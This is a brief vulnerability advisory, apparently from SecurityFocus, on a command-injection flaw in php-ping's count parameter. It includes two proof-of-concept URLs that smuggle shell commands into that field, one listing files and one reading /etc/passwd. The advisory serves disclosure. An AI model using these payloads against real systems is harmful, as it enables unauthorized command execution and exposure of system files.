php-ping Count Parameter Command Execution Vulnerability

The following proof of concept has been provided:

http://www.example.com/php-ping.php?count=1+%26+ls%20-l+%26&submit=Ping%21
http://www.example.com/php-ping.php?count=1+%26+cat%20/etc/passwd+%26&submit=Ping%21


 

Privacy Statement
Copyright 2010, SecurityFocus